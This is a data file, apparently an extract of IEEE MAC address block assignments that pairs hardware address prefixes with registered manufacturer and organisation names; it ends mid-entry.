F88A3C0 ART SPA 4C65A88 Instant Byte, S.L. 4C65A82 Orica Europe Pty Ltd & Co KG F88A3CB FARA AS 40A36B8 SFT Co., Ltd. F023B90 Aquametro AG F023B98 G3 TECHNOLOGIES< INC 04714BE Gimso Mobile Ltd 8C147D4 Nanjing bilian information Technology Co.,Ltd. 8C147DA Bluemega Document & Print Services 50FF994 IPC Global F023B96 Xiamen Jinhaode Electronic Co.,Ltd A0C5F2D UnaliWear, Inc. A0C5F29 Impulse Networks Pte Ltd A0C5F28 CoolR Group Inc A0C5F2C Glooko inc F023B94 EZVIS LIMITED 60D7E30 Avalun 60D7E3A Wilderness Labs Inc. 60D7E33 SKS Automaatio oy 60D7E35 Revol Technologies inc 08ED021 Imperx, Inc 08ED020 D2SLink Systems 98AAFCE Comarch S.A. 98AAFCC dots Inc. 144FD71 Zehnder Group AG 98AAFC9 BEAM Authentic F802787 BETTINI SRL 144FD7C D&S Cable Industries (HK) Limited 144FD72 FedEx Services OTI 144FD70 Annapurna labs 144FD78 NPort Networks Inc., A411638 Dspread Technology (Beijing) Inc. A411633 Pax 1CA0D34 NPO TELECOM JSC 1CA0D35 Dynamic Connect (Suzhou) Hi-Tech Electronic Co.,Ltd. 1CA0D36 Intertecno SRL "NISUTA" 40F385E BBB Inc. 1CA0D33 SAVELEC 40F3855 KATO ENGINEERING INC. 8CC8F44 ITECH Electronic Co.,ltd. 34049E5 Seeiner Technology Co.,LTD 34049E3 Nanjing Mythware Information Technology Co., Ltd. 34049EE ND SatCom GmbH A4580F4 Shenzhen City billion Leiden science and Technology Co., Ltd. A4580F5 CoAsia Microelectronics Corp. 500B91E Shenzhen zhong ju Fiber optical Co.Ltd A4580FE Finetree Communications Inc 7CCBE2B Easy Broadband Technology Co., Ltd. 7CCBE27 Hangzhou Kaicom Communication Co.,Ltd 7CCBE20 Heyuan Yongyida Technology Holdings Co.,Ltd. 244E7BA Shenzhen AWT science & technology limited 7CCBE23 Astrum Technologies CC 500B91D Shenzhen Lucky Sonics Co .,Ltd 244E7B0 Tekelek Europe Ltd 1CC0E14 Videri Inc. 7CCBE21 CeoTronics AG 500B91C Diamond Traffic Products, Inc 4865EED Winn Technology Co.,Ltd 4865EEB EnBW Energie Baden-Württemberg AG 1CC0E1A SECHERON SA 1CC0E13 HANGZHOU SOFTEL OPTIC CO., LTD 4CE1738 Nanjing Tongke Technology Development Co., LTD 4865EE3 Data Technology Inc. 4865EE1 Gopod Group Limited 4CE1736 DAIKOKU DENKI CO.,LTD. 244E7B9 UniMAT Automation Technology Co., Ltd. 383A217 Chengdu Krosslan Technology Inc. 383A219 Skylark Wireless LLC 4CE1734 Huizhou Dehong Technology Co., Ltd. 4CE173B Shanghai Ehong Technology Co.,Ltd 4CE1735 NewVastek AC64DDE DIGIBIRD TECHNOLOGY CO., LTD. AC64DD3 infypower Co., Ltd 383A21E SDNware technology co.,LTD 383A21B Pactron F81D78C SHENZHUOYUE TECHNOLOGY.,LTD 70F8E76 Flexim Security Oy F81D781 ADTECHNO Inc. 70F8E71 System Level Solutions (India) Pvt. 70F8E70 SHENZHEN Xin JiuNing Electronics Co Ltd 84E0F46 Liaoning IK'SONYA Science and Technology Co., Ltd. 84E0F41 MedicusTek Inc. 84E0F4A iSolution Technologies Co.,Ltd. 84E0F47 Dantherm 70F8E78 Eclipse Security 70F8E79 Kontech Electronics Co., Ltd 84E0F48 RAY Co.,LTD C0D3918 XENA SECURITY LIMITED C0D3912 Hofon Automation Co.,Ltd 986D354 blossom communications corp. C0D3913 IXON B.V. 58E876A SHENZHEN DIGISSIN TECHNOLOGY 58E876C KUSTOM SIGNALS INC 58E8768 Chengdu Vision-Zenith Technology Co.,Ltd C0D391D REGULUS CO.,LTD. F0ACD75 PAVO TASARIM URETIM TICARET A.S. F0ACD74 Sercomm Corporation. F0ACD77 Hanju Network Technologies Co. 283638D APPEAK Technology System Co.Ltd. F0ACD78 Telefonix Incorporated F0ACD76 Suzhou Pairlink Network Technology 2836380 Knowles Electronics LLC 2836384 Dspread Technology (Beijing) Inc. 283638A Bluekey Pty Ltd 8C192D7 SRETT 8C192DB Abside Networks, Inc. 8C192D8 Shenzhen Cylan Technology Co.,Ltd 8C192D9 ViaWear, Inc. 8C192DC You Zhengcheng co.,ltd 8C192D4 Charmlink Tech(HK) Co.,Limited C47C8D3 Watec Co., Ltd. C47C8DA Silvus technologies inc D0D94FD DUKSANMECASYS CO., LTD. CCD31E9 Siemens AG, MO MLT BG C47C8D8 GETEMED Medizin- und Informationstechnik AG C47C8DB GC AUTOMATION CO,LTD 6891D0E Outstanding Technology Co., Ltd. C47C8D4 ROBOSTAR 6891D05 NIPK Electron Co. E0B6F5C funktel GmbH 6891D01 Multi Alarm Zrt. 6891D09 QUANTEX E0B6F58 Yuneec International(China)Co.,Ltd E0B6F56 POMCube Inc. 50FF992 SHENZHEN KINGVT ELECTRONICS CO.,LTD E0B6F53 Huizhou GISUN Industrial CO. LTD 986D356 Vitronic Dr.-Ing. Stein Bildverarbeitungssysteme GmbH 986D35D Praesideo B.V. 7C477C8 Shenzhen Eunicum Electric Co.,Ltd. 7C477C0 BungBungame Inc 986D357 Zhejiang Hanshow Technology Co., Ltd. 50FF997 Honeywell International 7C477C1 Photosynth Inc. 7C477C6 Zerosystem LTD.Co 7C477C5 Midwest Microwave Solutions 5CF286E Daisen Electronic Industrial Co., Ltd. 5CF286A Unfors Raysafe AB 38FDFE4 New Telecom Solutions LLC 38FDFE5 CaptiveAire Systems Inc. 38B8EB8 CeeNex Inc 78CA83C Elanview Technology Co.,Ltd 78CA837 Beijing CarePulse Electronic Technology 78CA838 IHM 78CA83B Zhejiang Science Electronic Tech Co., Ltd 1C87745 Xiaoxinge (Tangshan) Electronic Technology Co., Ltd. 1C88798 Toshiba Toko Meter Systems Co., LTD. 1C87744 Weber Marking Systems GmbH 1C8774C New Nordic Engineering 1C87799 Istria soluciones de criptografia, S. A. 1C8774D CLABER SPA 1C87747 Ing Buero Ziegler 1C8779A Hangzhou Xiaowen Intelligent Technology Co., Ltd. 1C87798 ZHEJIANG ITENAL TECHNOLOGY CO.,LTD 40A36B7 Pella Corporation 8439BEB Shenzhen Horn Audio Co.,Ltd. 8439BE8 Diamond Products LLC 1C87791 A-GEAR COMPANY LIMITED 40A36BB Amobile Intelligent Corp. 40A36B0 Fin Robotics Inc 40A36B3 Omnitracs, LLC 800A806 Beijing Gooagoo Technical Service Co.,Ltd. 800A805 Shenzhen Zidoo Technology Co., Ltd. A03E6BE Nanjing zhanyi software technology co., LTD 0055DAC Donguan WideLink Communication Technology Co.,Ltd. 0055DA7 LUCISTECHNOLOGIES(SHANGHAI)CO.,LTD A03E6B1 Business Support Consultant Co.,Ltd 0055DA3 Novexx Solutions GmbH CC1BE05 Earphone Connection, Ubc. DC4427B Nautilus Infotech CO., Ltd. DC4427C Pyrexx Technologies GmbH 1C21D11 Ognios GmbH 1C21D1C Private C88ED11 German Pipe GmbH DC4427A Shanghai Huahong Integrated Circuit Co.,Ltd DC44274 Nex Technologies PTY LTD B0C5CA9 D&T Inc. 78C2C0A Ombitron, Inc. 78C2C08 Beijing Coilabs technology co.,ltd 78C2C0D KORF Inc. 78C2C07 Guangzhou Hongcai Stage Equipment co.,ltd 74F8DB7 Wuhan Tianyu Information Industry Co., Ltd. 74F8DB4 WiFi Hotspots, SL 74F8DB2 Shenzhen Ruishi Information Technology Co.,Ltd. B437D10 Lezyne INC USA 549A117 Niveo International BV B437D17 GE Power Management B437D16 Yireh Auto Tech Co.,Ltd. 549A11E Beijing HTSmartech Co.,Ltd 807B85A Interplan Co., Ltd. 64FB812 Seven Solutions S.L 1CCAE3D eSight Corporation 549A114 eTauro LLC 549A113 Royal Boon Edam International BV 549A110 Shenzhen Excera Technology Co.,Ltd. 807B856 Quickte Technology Co.,Ltd 64FB81E ChengDu KeChuang LongXin Sci-tech Co.,Ltd 64FB819 hiQview Corporation 64FB81D Dongyang unitech.co.ltd 1CCAE37 Bird Home Automation GmbH 64FB81C Bridgeport Instruments, LLC 80E4DA4 Beijing Yuantel Technolgy Co.,Ltd-Shenzhen Branch 80E4DA3 Beijing Gaokezhongtian Technology Co Ltd 90C6828 Teletek Electronics 90C6826 Nanjing Jiexi Technologies Co., Ltd. 90C6827 Cinet Inc 80E4DAB Nanjing LILO Technology Co. Ltd. 80E4DAC EVER Sp. z o.o. 80E4DA8 Krizer international Co,. Ltd. 2CD1416 Bowei Technology Company Limited 90C682E Shanghai HuRong Communication Technology Development Co., Ltd. 2CD1417 XiaMen 35.com Technology Co,.Ltd. 90C6823 Innovative Electronic Technology 2C6A6FA Wellntel, Inc. 2C6A6F0 Shanghai Shuncom Electronic Technology Co.,Ltd A0BB3E6 Xiamen Kehua Hengsheng Co.,Ltd A0BB3E8 AutarcTech GmbH A0BB3E9 Sandal Plc 28FD804 Digital Signal Corp 2C265FE Hysentel Technology Co., Ltd F802782 Innodisk 2C265F5 Motec GmbH F802789 Beijing Redcdn Technology, Co., Ltd 0CEFAF4 Sentry360 A44F293 Comsel System Ltd 3C39E74 University of British Columbia D022128 Shenzhen SIC Technology. Co., Ltd. D022126 URANO INDUSTRIA DE BALANCAS E EQUIPAMENTOS LTDA 1007230 RippleTek Tech Ltd E818631 clabsys D022122 RHENAC Systems GmbH D022121 AIM E818639 BSM Wireless Inc. E818637 Siliconcube B8D8121 VOTEM B8D812D Lam Research B8D812C Yuwei Info&Tech Development Co.,Ltd B8D8126 Vonger Electronic Technology Co.,Ltd. 74E14A3 emz-Hanauer GmbH & Co. KGaA 74E14A4 open joint stock company "YUG-SISTEMA plus" E4956E4 Guang Lian Zhi Tong Technology Limited E4956E1 Tband srl BC6641A EBlink BC66418 Shenzhen Yaguang communication CO.,LTD E4956E7 NationalchipKorea E4956E3 Shanghai DGE Co., Ltd BC66412 Process-Electronic Sp. z o.o. 58FCDBE Applied Device Technologies E4956EE Tacom Projetos Bilhetagem Inteligente ltda 58FCDBD XIAMEN LEELEN TECHNOLOGY CO.,LTD B01F814 SHENZHEN YIFANG DIGITAL TECHNOLOGY CO.,LTD. 58FCDB2 Beseye Cloud Security Co. Ltd. F40E112 Axel srl B01F81B Rademacher Geraete-Elektronik GmbH 141FBAB Newings Communication CO., LTD. F40E110 realphone technology co.,ltd F40E119 Sterna Security BC3400A AURALIC LIMITED BC34006 Cameron A43BFA9 SHEN ZHEN PASUN TECH CO.LTD. 7C70BC3 FLEXIM GmbH 7C70BCB Tohan Engineering Corporation 141FBA3 Private 7419F87 Heptagon Systems PTY. LTD. 7419F8B IDEXX Laboratories, Inc A43BFA3 Circus World Displays Ltd D07650D tecnotron elekronik gmbh D076509 Greenwave Scientific D076500 CentrAlert, Inc. 7419F8C Bach Icon ApS A43BFA1 Beijing Uniwill Science and Technology Co,Ltd A43BFA0 Chengdu Territory Technology Co.,Ltd 90F4210 Gemstone Lights 90F4215 DESKO GmbH B0FF723 Hammerhead Navigation Inc. 90F421D Taichitel Technology Shanghai Co.,Ltd. B0FF726 Tachyon Energy 90F421A Proqualit Telecom LTDA 90F4217 Senstar Corporation B0FF72B Launch Tech Co., Ltd. B0FF728 ERA RF Technologies BC3198D Shanghai Sigen New Energy Technology Co., Ltd C86BBCB HAI ROBOTICS Co.,Ltd. 58C41E9 ShenZhen Heng Yue Industry Co.,Ltd C86BBC0 SafelyYou 58C41EB Pulse Structural Monitoring Ltd 58C41E7 HwaCom Systems Inc. 58C41E3 Lemco IKE 68DA736 Global Networks ZEN-EI Co., Ltd 68DA731 DTEN Inc. 68DA734 Agramkow A/S 68DA73E Synamedia 50482C1 Annapurna labs 50482C7 Oliver IQ, Inc. 50482CA JUNG HO 50482CE Harbin Nosean Tese And Control Technology Co.,Ltd D015BB5 Listen Technologies D015BB8 ALEKTO-SYSTEMS LTD D015BBB EdgeDX D015BBE PHYTEC EMBEDDED PVT LTD 6431394 Active Brains 88A6EF3 Enlaps 6C2ADFE WeatherFlow-Tempest, Inc C0FBF91 LIXIL Corporation B44D433 ETSME Technologies C0., Ltd. B44D431 iLine Microsystems S.L. (B20956751) B44D438 ShenZhen Launch-Wonder Technology co., LTD B44D43A UAV Navigation B44D439 AD HOC DEVELOPMENTS S.L 6C2ADF0 Ademco Inc. dba ADI Global Distribution B44D432 RG SOLUTIONS LTD 6C2ADF4 Zhejiang Eternal Automation Sci-Tec Co., Ltd 6C2ADF8 Beijing Yisheng Chuanqi Technology Co., Ltd. 6C2ADFB MOBA Mobile Automation AG 7006927 DCNET SOLUTIONS INDIA PVT LTD 7006921 Beijing Fortech Microsystems., Co., Ltd. 54083B5 shenzhen HAIOT technology co.,ltd 54083B4 Toray Medical Company Limited 9802D8F Private 54083B3 Dhyan Networks and Technologies, Inc DC4427F Private CC1BE0F Private 74E14AF Private 1CCAE3F Private C88ED1F Private D02212F Private E03C1CE Annapurna labs E03C1C0 Scangrip E03C1C7 Tap Home, s.r.o. E03C1C3 Dewetron GmbH E03C1C6 GhinF Digital information technology (hangzhou) Co., Ltd E03C1CC Meferi Technologies Co.,Ltd. E03C1C4 Earable Inc. D016F05 wuxi high information Security Technolog D093957 iSolution Technologies Co.,Ltd. D016F08 Shenzhen DOOGEE Hengtong Technology CO.,LTD D016F03 Sofinet LLC 0CEFAFF Private 1C21D1F Private E03C1C2 Hoplite Industries, Inc. D093955 FungHwa i-Link Technology CO., LTD D09395A Automatic Devices D09395D T-COM LLC D09395C BRICK4U GmbH D093959 NINGBO SUNNY OPOTECH CO.,LTD 5C6AECC Suzhou Huaqi Intelligent Technology Co., Ltd. 5C6AEC8 Optiver Services B.V. 88C9B3A WEG AUTOMATION EUROPE S.R.L. 7C45F9E Scania CV AB 7C45F91 Hunan Shengyun Photoelectric Technology Co., LTD C0EAC38 CDSTech C0EAC37 Annapurna labs C08359C Private 8C5DB25 Unite Audio 8C5DB20 NPP NTT LLC 705A6F1 BMR s.r.o. C4A5594 Private 94C9B79 Titanium union(shenzhen)technology co.,ltd 705A6FA Annapurna labs 705A6F3 Wavelab Telecom Equipment (GZ) Ltd. C4A559D MINOLTA SECURITY C4A5597 Aviron Interactive Inc. 705A6FC CoolR Group Inc 705A6FB Callidus trading, spol. s r.o. 0CCC471 General Industrial Controls Pvt Ltd C4A5598 METICS 84B3862 Annapurna labs 84B3866 ALPHA Corporation 84B386D Dongguan Amsamotion Automation Technology Co., Ltd E0382DD KEPLER COMMUNICATIONS INC. 0CCC477 Cyrus Audio LTD 0CCC474 Qingdao Geesatcom Technology Co., Ltd 0CCC470 Shenzhen Jooan Technology Co., Ltd E0382DA 4D Photonics GmbH F0221DB LK Systems AB E0382D9 Velvac Incorporated F0221D1 Dr. Eberl MBE Komponenten GmbH D461378 Beijing Digital China Yunke Technology Limited D46137B KunPeng Instrument (Dalian)Co.,Ltd. 4C74A77 COREIP TECHNOLOGY PRIVATE LIMITED 4C74A7A RAONARK D46137D IPTECHVIEW D46137A Shenzhen Xunjie International Trade Co., LTD 4C74A79 Suzhou XiongLi Technology Inc. 4C74A70 Shenzhen Timekettle Technologies Co.,Ltd 4C74A74 Wuxi Micro Innovation Integrated Circuit Design Co., Ltd D096863 EPHI B.V. D096866 Shenzhen Ntmer Technology Co., Ltd. D4BABA3 Shenzhen Pu Ying Innovation Technology Corporation Limited D4BABA8 Chengdu Ba SAN SI YI Information Technology Co., LTD D4BABA1 Annapurna labs D4BABA9 Shenzhen Chuangyou Acoustic Technology Co., Ltd. D4BABAD AADONA Communication Pvt Ltd D4BABA5 ReeR SpA D4BABAC Rusatom Automated Control Systems, Joint-Stock Company C483727 clk2.inc C48372C Acenew technology(shenzhen) limited company D42000E RPUSI Communication Technology Co.,Ltd. D42000D ZUUM C483726 Netplus Co., Ltd. C498941 SEAVIEW TELECOM 986EE8B Private 5847CAA Powder Watts, LLC 5847CAB Suzhou Laisai Intelligence Technology Co.,Ltd 883CC54 Swabian Instruments GmbH 883CC5A Corigine,Inc. 5847CAC SMS ELECTRIC CO., LTD ZHENGZHOU D42000C Gentec Systems Co. D42000A BirdDog Australia D420004 EVOC VIN Technology Co.,Ltd 883CC5B Shenzhen shijia chuangxin Technology Co., Ltd 18C3F47 Shenzhen Yecon-Tech Co.,Ltd. 18C3F4D Shenzhen C & D Electronics Co., Ltd. 8CC8F47 TableSafe 300A603 Intergard do Brasil Ind e Com de Eletr e Mec Ltda 10DCB60 Apex Supply Chain Technologies 2C691DE Chengdu Qianhong Communication Co., Ltd. 18C3F4A Shenzhen Yunlianxin Technology Co., Ltd. 18C3F44 Annapurna labs 2C691D6 Carnegie Robotics 2C691DC Aparian, Inc. 2C691D9 SHENZHEN EX-LINK TECHNOLOGY CO.,LTD 303D514 Dspread Technology (Beijing) Inc. 303D513 S & A Systems FC61792 Shenzhen Shenshui Electronic Commerce Co.,Ltd 2C691D3 Sunsa, Inc 303D51E Percent.com 303D515 Media Hub Digital Smart Home Pty Ltd. 303D51A TeraNXT Global India Pvt Ltd. 0C7FED3 Soft dB 0C7FED8 U-tec Group Inc. 8C51099 Frontmatec 8C51097 ENPLUG Co., Ltd. FC61790 Zhuhai Anjubao Electronics Technology Co., Ltd. FC61798 Annapurna labs FC61799 MACH SYSTEMS s.r.o. 0C7FED5 ShenZhen TianGang Micro Technology CO.LTD 8002F46 Mech-Mind Robotics Technologies Ltd. 8002F49 XUNDI(XIAMEN) ELECTRONIC TECHNOLOGY CO.,LTD. 8002F45 Sichuan Fanyi Technology Co. Ltd. 7050E71 Annapurna labs 7050E7B Beijing Shannoncyber Technology Co.,Ltd 7050E70 Shenzhen C & D Electronics Co., Ltd. 8002F4A PassiveLogic 8002F4D Jiangsu Vedkang Medicl Sclence and Technology Co.,Ltd 8002F44 Infors AG C4A10E7 Guangzhou South Satellite Navigation Instrument Co., Ltd. C4A10EB Clinton Electronics Corporation C4A10E2 Wistron InfoComn (Kunshan) Co., Ltd. 6C1524E AEC s.r.l. 18A59C3 Beijing QS Medical Technology Co., Ltd. C4A10E4 Harbour Cross Technology Ltd 6C15247 Motium Pty Ltd 6C15241 Telsonic AG 6C1524D SYMLINK CORPORATION 1C59740 Shenzhen Hanshine Technology Co.Ltd. 1C59742 Chongqing Taishan Cable Co., Ltd 18A59C7 ePower Network Solution Co., Ltd. 18A59CA Erba Lachema s.r.o. 381F263 Bosch Automotive Electronics India Pvt. Ltd. 6C93083 LightnTec GmbH 3043D71 Shenzhen juduoping Technology Co.,Ltd 3043D76 Sprocomm Technologies Co., Ltd.Guangming Branch 3043D7E Guangdong Hongqin Telecom Technology Co. Ltd. 1054D2E COSMO AIOT TECHNOLOGY CO LTD 6C9308C Shenzhen haichangxing Technology Co., Ltd. 0C8629E FX TECHNOLOGY LIMITED 1054D20 GIPS Technology Co., Ltd. 1054D2A Embion B.V. 1054D23 Little Array Technology (Shenzhen) Co., Ltd. 1054D2C LUXSHARE-ICT Co., Ltd. 0C8629C SHENZHEN YINGMU TECHNOLOGY.,LTD 0C8629A Nipron Co.,Ltd 988FE06 Huaqin Technology Co.,Ltd. 988FE08 Changzhou Perceptime Technology Co.,Ltd. 0826AEC Brannstrom Sweden AB 988FE0A Pavana Technologies JSC. 988FE04 Schmid AG, energy solutions 0826AE6 Newcapec co.,Ltd 0826AE4 BANGJOO Co., Ltd. 04EEE85 RealWear DC36431 Dongguan Pengchen Earth Instrument CO. LT DC3643D Hangzhou Huanyu Vision Technology Co., Ltd 18D793E Teegarden Applied Science Inc 18D793B EcoG DC36433 WIS Networks DC36430 Meier Tobler AG DC3643B nami.ai 28FD80A Apollo Digital (Taiwan) Ltd. 94C9B7E shenzhen UDD Technologies,co.,Ltd 94C9B75 Beijing Anyunshiji Technology Co., Ltd. 04EEE83 Fluid Management Technology 04EEE82 Hengke Technology Industry Co., Ltd. 04EEE84 Shenzhen Daotong Technology Co.,Ltd 94C9B7B 3D Biomedicine Science & Technology Co., Limited 94C9B7A ShenZhen Beide Technology Co.,LTD 50A0302 Annapurna labs 50A0309 DPA Microphones A/S 50A0306 Abacus Research AG 50A0304 Alert Innovation 94C9B70 Fairy Devices Inc. 08F80DC ZMBIZI APP LLC 08F80D3 Annapurna labs 1845B3C Bdf Digital 08F80D4 FG-Lab Inc. F4A454C Integrated Dynamics Engineering GmbH F4A4549 Lonton infomation tech Ltd., Co F4700C5 Shenzhen Lidaxun Digital Technology Co., LTD F4A4547 Advanced Mechanical Technology, Inc. d/b/a AMTI 1845B36 Harmonic Technology Limited 1845B3A Guangzhou Aoshi Internet Information & Technology Co.,Ltd. 1845B34 Mission Secure Inc 9880BB5 Melexis Technologies NV 7872646 Shenzhen C-DIGI Technology Co.,Ltd. 1CAE3E1 IPROAD,Inc 1CAE3EE Broachlink Technology Co.,Limited 1CAE3E2 LINKWISE TECHNOLOGIES CO., LIMITED 1CAE3EB Beijing Boyan-rd Technology Development CO.,LTD 9880BBA Guangzhou Shortcut Technology Co.,Ltd. 9880BB2 Shanghai ECone Technology Co.,Ltd. 9880BB8 Jyh Eng Technology Co., Ltd 986EE82 Ugreen Group Limited 986EE81 Shanghai Pixsur Smart Technology Co.,Ltd 1CAE3E5 Netvio Ltd 1CAE3E8 JingQi(tianjin) technology Co., Ltd 38A8CD4 WHITEvoid GmbH 7C83340 Thermalimage 38A8CD3 Dongguan Fyrnetics Co., Ltd 2836131 Hi-p (Suzhou) Electronics Co,Ltd 785EE8B Lantern Engineering (Pty) Ltd 785EE87 MT B?LG? TEKNOLOJ?LER? VE DI? T?C. A.?. 785EE85 INFOMOBILITY S.R.L. 785EE80 Youtransactor 785EE8A Yake (Tianjin) Technology Co.,Ltd. 5848499 Shenzhen Tongye Technology Co.,Ltd 44A92CE Annapurna labs 44A92C3 Luxonis Holding Corporation 5848490 Beijing Zhongyuanyishang Technology Co Ltd 5848491 SKAARHOJ ApS 6433B5D IIYAMA CORPORATION 6433B5A Hometek Eletronics Co., Ltd 584849E Avadesign Technology Co. Ltd. 6433B51 Huaqin Telecom Technology Co.,Ltd. 5848493 Viper Design LLC 5848495 Hubei Shudi Communication Technology Co., Ltd 6433B53 Wingtech Mobile Communications Co.,Ltd 2836133 Linear Computing Inc. 44A92C5 Shenzhen Lianfaxun Electronic Technology Co.,Ltd F02A2BD Definitely Win Corp.,Ltd. F02A2B0 Merlin Security Inc. F02A2B2 Shanghai Armour Technology Co., Ltd. F02A2BB EL.MO. spa F02A2B5 Agile Sports Technologies, dba Hudl F02A2B4 Onclave Networks F02A2BA Navigil Ltd A85B36B "Lampyris Plant" LLC 44A92CA Digiport OU 44A92CC Cubitech 7813051 Global Media Streaming LLC 781305A Leonardo SpA - Montevarchi 7813050 InnoSenT 7813054 Jiangxi Winsky Intelligence Technology Co., Ltd E878290 Tanz Security Technology Ltd. E878293 Electronic Controlled Systems, Inc. 7813055 ATS-CONVERS,LLC A85B368 ShangHai SnowLake Technology Co.,LTD. E878296 AXING AG 1874E2E G&O Audio Co.,LTD D09FD9E Minibems Ltd D09FD99 ENTTEC Pty Ltd. D09FD91 elecgator bvba C0FBF93 SHENZHEN HEQIANG ELECTRONICS LIMITED D09FD95 Carbon Mobile GmbH C0FBF95 HAGUENET C0FBF9B SHENZHEN COMIX HST CLOUD COMPUTING CO., LTD. C8F5D66 Jabil C8F5D6D Volansys technologies pvt ltd 20CE2A2 Jabil 20CE2AC Ariston Thermo s.p.a. 88C9B30 ADOPT NETTECH PVT LTD 0C5CB58 Shenzhen C & D Electronics Co., Ltd. 0C5CB57 Energybox Limited 0C5CB59 Colordeve International 20CE2A7 Beijing Huadianzhongxin Tech.Co.,Ltd 1CA0EF6 HANJEN.CHIN CO., LTD. 0C5CB53 iH&S Technology Limited 0C5CB54 Annapurna labs 601592E Annapurna labs 6015921 RTDS Technologies Inc. 6015923 OSI TECHNOLOGY CO.,LTD. 6015929 JIANGSU SUNFY TECHNOLOGIES HOLDING CO.,LTD. 601592C PSS Co., Ltd DCE533A Amazinglayer Network Co., Ltd. 245DFC2 Blue Iris Labs 245DFC7 LTY LLC 9827826 WESTERN SECURITY SOLUTIONS E86CC7E Annapurna labs E86CC73 Shenzhen Yibaifen Industrial Co.,Ltd. E86CC7D z-max mediasolution 0411199 AC Power Distribution / ACT Entmt. 041119D Nuance Hearing Ltd. 041119A CyOne Security AG 245DFC1 ARTICONA - Bechtle Logistik & Service GmbH 0411193 SUZHOU RIBAO TECHNOLOGY CO.,LTD. 446FD86 Anhui GuDao Tech 446FD89 Annapurna labs 9827823 Danfoss Power Solutions 9827820 SHENZHEN HEROFUN BIO-TECH CO., LTD 982782B RayTron, INC. 982782D Thorlabs GmbH A0024A0 Zhejiang Hechuan Technology Co.,Ltd 78D4F12 Lyngsoe Systems 446FD8D SCAIME 78D4F1E Blue Sparq, Inc. 78D4F1A BONENG TRANSMISSION(SUZHOU)CO.,LTD A0024A3 SomaDetect Inc A0024AD bitbee Inc A453EEE MEGACOUNT A453EE7 Beijing Lanke Science and Technology Co.,LTd. A453EE8 T-Touching Co., Ltd. 8CAE49D Larch Networks 6879124 McDonald's Corporation 687912D Neurolab 8C476E6 Oxford Nanopore Technologies Ltd. 3009F91 Shenzhen Sunvell Electronics Co., Ltd. 8C476ED innolectric AG DC4A9EC HEFEI DATANG STORAGE TECHNOLOGY CO.,LTD DC4A9E1 Advanced Electronics Ltd 8411C26 KESSEL AG 8411C2A igus GmbH 6879121 Annapurna labs DC4A9EE SES-imagotag Deutschland GmbH FCCD2F6 Annapurna labs 58E8760 Zhuhai Raysharp Technology Co.,Ltd FCCD2FB HEAD-DIRECT (KUNSHAN) Co. Ltd FCCD2F7 Suzhou lehui display co.,ltd 5895D83 Tonnet Telecommunication International Co., Ltd. DC4A9E4 ADIAL 5895D8E Gmv sistemas SAU 5895D84 Unity Surveillance, Inc. FCCD2F8 Asesorias y Servicios Innovaxxion SPA 5895D88 Shenzhen C & D Electronics Co., Ltd. FCCD2FE Eltek brojila d.o.o. 58208A2 MARS DIGI TECH CO .,LTD 58208A3 Aggregate Co.,Ltd. 58208A7 pureLiFi Ltd CC4F5C8 Feelmore Labs 18FDCB4 Gosuncn Technology Group Co.,LTD. D01411E Tecnosoft srl C0619AB Victron Energy B.V. C86314A Optictimes Co.,Ltd 18FDCBD StreamLocator 98FC84E Dongguan Kingtron Electronics Tech Co., Ltd 28B77CB Vehant Technologies Pvt Ltd. C0619A2 Grup Arge Enerji ve Kontrol Sistemleri 98FC847 Broadtech Technologies Co., Ltd. 98FC849 Fath Mechatronics C0619A6 IPG Automotive GmbH C0619A4 Stello F469D55 Hefei STAROT Technology Co.,Ltd F469D56 TianJin KCHT Information Technology Co., Ltd. F469D5E ORtek Technology, Inc. 28B77C3 Beijing Kitten&Puppy Technology Co.,Ltd. 4C93A69 Advantics 28B77C5 GROTHE GmbH 28B77C0 SHENZHEN EVIEW GPS TECHNOLOGY 28B77CA Simaudio Ltd 4C93A6B Felten Electronics 5C857E8 BeiJing Xinsheng Technology Co.,Ltd 5C857EB HHCC Plant Technology Co., Ltd. 5C857E0 28 Gorilla F469D5B Konntek Inc D014118 Video Security, Inc. D014113 iLOQ Oy D014117 Realwave Inc. 3049508 SHENZHEN LDROBOT CO., LTD. 304950D Merlyn Mind, Inc. CCC261B Winterthur Gas & Diesel Ltd. CCC2611 NWL Inc. CCC2616 Guardiar USA CCC261C Nortek Security & Control CCC2613 NETRADYNE, INC. F0D7AFA MSTAR TECHNOLOGIES,INC F0D7AF2 Blacknight Internet Solutions Limited F0D7AF5 Dongguan Huili electroacoustic Industrial Co.,ltd F0D7AF9 New IT Project LLC 38F7CDE APT MOBILE SATCOM LIMITED 7069791 Linksys Telecom Shenzhen CO., LTD 706979D FREUND ELEKTRONIKA D.O.O., IP-INTEGRA TECHNOLOGIES E8B470A plc2 Design GmbH E8B4709 Miltek Industries Pte Ltd C09BF45 Infiot Inc. C09BF4B NUCTECH COMPANY LIMITED E8B4700 DongGuan Ramaxel Memory Technology E8B4702 internet domain name system beijing engineering research center ltd E8B4708 DEHN SE + Co KG C09BF43 Osprey Video, Inc C09BF44 JSC NPK ATRONIK C09BF4C Pinpark Inc. E8B4706 Elcoma E8B4705 Alperia Fiber srl F041C85 XI'AN MEI SHANG MEI WIRELESS TECHNOLOGY.Co., Ltd. F490CB5 Avilution F490CB9 Fractyl Labs A4DA229 Malldon Technology Limited F490CB0 Epitel, Inc. A019B29 Lon Microsystems Inc. F490CB4 OmniNet 9405BBC LAO INDUSTRIA LTDA 9405BBB AUSTAR HEARING SCIENCE AND TECHNILIGY(XIAMEN)CO.,LTD 6462667 Shenzhen C & D Electronics Co., Ltd. 6462664 Redstone Systems, Inc. 6462669 Chunghwa System Integration Co., Ltd. 646266B Signal Hound 6462662 Protectli 14AE850 Kayamatics Limited 646266D Kobol Innovations Pte. Ltd. 14AE858 Trimble LEM B0B3532 Rizhao SUNWAM International Co., Ltd. B0B353A Ledger 50DE194 Langogo Technology Co., Ltd. 3CFAD33 Harman Connected Services, Inc. 3CFAD3A UltiMachine 3CFAD34 GRG Banking Technology Co.,Ltd 402C76D Guangzhou Qi'an Technology Co., Ltd. 402C76B Beijing Kuaiyu Electronic Co., Ltd. 200A0D5 Shenzhen Zhangyue Technology Co.,Ltd 0069674 Command Alkon, Inc 200A0D1 Wideband Systems, Inc. 200A0DC sehwa A0224E4 TMGcore, Inc. A0224E8 EISST International Ltd A0224E0 Kyung In Electronics 5062551 Hagiwara Solutions Co., Ltd 506255A CCTV Manufacturer 5062558 Roda industrial development Co.,Ltd. 6431392 Smartplus Inc. C4954DB Multicom, Inc C4954DD Newland Era Edu Hi-Tech(BeiJing)Co.,Ltd 643139A Product Development Associates, Inc. 6431395 Shenzhen He&e Technology Co.,Ltd. 6431398 Shenzhen Huanyin Electronics Ltd. 0069677 